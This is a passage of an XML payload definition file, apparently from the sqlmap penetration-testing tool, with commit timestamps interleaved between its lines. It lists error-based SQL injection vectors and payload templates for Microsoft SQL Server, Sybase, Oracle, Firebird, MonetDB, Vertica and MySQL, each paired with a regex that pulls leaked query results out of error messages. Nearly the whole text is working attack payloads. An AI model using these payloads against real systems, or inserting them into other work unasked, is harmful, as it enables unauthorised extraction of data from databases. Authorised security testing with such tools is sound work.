<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-10-11 02:07:31 +03:00
<vector > AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-10-11 02:07:31 +03:00
<payload > AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-10-07 00:50:32 +03:00
<title > Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-10-07 00:50:32 +03:00
<level > 2</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-20 21:34:47 +03:00
<where > 2</where>
2016-10-11 02:07:31 +03:00
<vector > OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-10-11 02:07:31 +03:00
<payload > OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2016-05-11 10:42:54 +03:00
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
2016-10-07 00:50:32 +03:00
<title > Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)</title>
2016-05-11 10:42:54 +03:00
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2016-05-11 10:42:54 +03:00
<where > 1</where>
2016-10-07 00:50:32 +03:00
<vector > AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
2016-05-11 10:42:54 +03:00
<request >
2016-10-07 00:50:32 +03:00
<payload > AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
2016-05-11 10:42:54 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
2016-10-07 00:50:32 +03:00
<title > Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)</title>
2016-05-11 10:42:54 +03:00
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2016-05-11 10:42:54 +03:00
<where > 2</where>
2016-10-07 00:50:32 +03:00
<vector > OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
2016-05-11 10:42:54 +03:00
<request >
2016-10-07 00:50:32 +03:00
<payload > OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
2016-05-11 10:42:54 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-10-07 00:50:32 +03:00
<title > Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 2</level>
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2016-10-07 00:50:32 +03:00
<vector > AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-10-07 00:50:32 +03:00
<payload > AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-10-07 00:50:32 +03:00
<title > Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-10-07 00:50:32 +03:00
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 2</where>
2016-10-07 00:50:32 +03:00
<vector > OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-10-07 00:50:32 +03:00
<payload > OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 1</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-20 21:34:47 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 1</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-18 13:13:44 +03:00
<where > 2</where>
2015-02-20 21:34:47 +03:00
<vector > OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Oracle</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
<level > 2</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-20 21:34:47 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Oracle</dbms>
<dbms_version > > = 8.1.6</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 2</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-18 13:13:44 +03:00
<where > 2</where>
2015-02-20 21:34:47 +03:00
<vector > OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Oracle</dbms>
<dbms_version > > = 8.1.6</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 3</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-20 21:34:47 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-18 13:13:44 +03:00
<where > 2</where>
2015-02-20 21:34:47 +03:00
<vector > OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2015-03-31 08:33:50 +03:00
<test >
<title > Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-31 08:33:50 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-03-31 08:33:50 +03:00
<where > 2</where>
<vector > OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-02-20 21:34:47 +03:00
<title > Firebird AND error-based - WHERE or HAVING clause</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 3</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-20 21:34:47 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<payload > AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
2015-02-20 21:34:47 +03:00
<dbms > Firebird</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
<title > Firebird OR error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,9</clause>
2015-02-18 13:13:44 +03:00
<where > 2</where>
<vector > OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
2020-01-17 19:14:41 +03:00
<test >
<title > MonetDB AND error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MonetDB</dbms>
</details>
</test>
<test >
<title > MonetDB OR error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request >
<payload > OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MonetDB</dbms>
</details>
</test>
2020-01-21 17:40:59 +03:00
<test >
<title > Vertica AND error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,8,9</clause>
<where > 1</where>
<vector > AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request >
<payload > AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Vertica</dbms>
</details>
</test>
<test >
<title > Vertica OR error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,8,9</clause>
<where > 2</where>
<vector > OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request >
<payload > OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Vertica</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<!--
TODO: if possible, add payload for SQLite, Microsoft Access,
and SAP MaxDB - no known techniques at this time
-->
2015-02-20 21:34:47 +03:00
<!-- End of error - based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
2015-02-18 13:13:44 +03:00
2015-02-20 21:34:47 +03:00
<!-- Error - based tests - LIMIT clause -->
2015-02-18 13:13:44 +03:00
<test >
<title > MySQL > = 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
<stype > 2</stype>
<level > 2</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
<request >
<payload > PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
2015-02-20 21:34:47 +03:00
<!-- End of error - based tests - LIMIT clause -->
2015-02-18 13:13:44 +03:00
<!-- Error - based tests - Parameter replace -->
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 5</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2016-06-01 15:12:22 +03:00
<vector > (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<!-- These work as good as ELT(), but are longer
2016-06-01 15:12:22 +03:00
<payload > (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
<payload > (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
2015-02-20 21:34:47 +03:00
-->
2016-06-01 15:12:22 +03:00
<payload > (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.5</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.5 error-based - Parameter replace (EXP)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 5</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2016-06-01 15:12:22 +03:00
<vector > EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.5</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 5</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2016-06-01 15:12:22 +03:00
<vector > JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.7.8</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-08-28 11:52:36 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.0 error-based - Parameter replace (FLOOR)</title>
2015-08-28 11:52:36 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 1</level>
2015-08-28 11:52:36 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-08-28 11:52:36 +03:00
<where > 3</where>
2016-10-05 00:48:09 +03:00
<vector > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
2015-08-28 11:52:36 +03:00
<request >
2016-06-01 15:12:22 +03:00
<!-- These work as good as ELT(), but are longer
2016-10-05 00:48:09 +03:00
<payload > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
<payload > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
2016-06-01 15:12:22 +03:00
-->
2016-10-05 00:48:09 +03:00
<payload > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
2015-08-28 11:52:36 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.0</dbms_version>
2015-08-28 11:52:36 +03:00
</details>
</test>
2016-06-01 14:23:41 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.1 error-based - Parameter replace (UPDATEXML)</title>
2016-06-01 14:23:41 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 4</level>
2016-06-01 14:23:41 +03:00
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 3</where>
2016-06-01 15:12:22 +03:00
<vector > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
2016-06-01 14:23:41 +03:00
<request >
2016-06-01 15:12:22 +03:00
<!-- These work as good as ELT(), but are longer
<payload > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
<payload > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
-->
<payload > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
2016-06-01 14:23:41 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
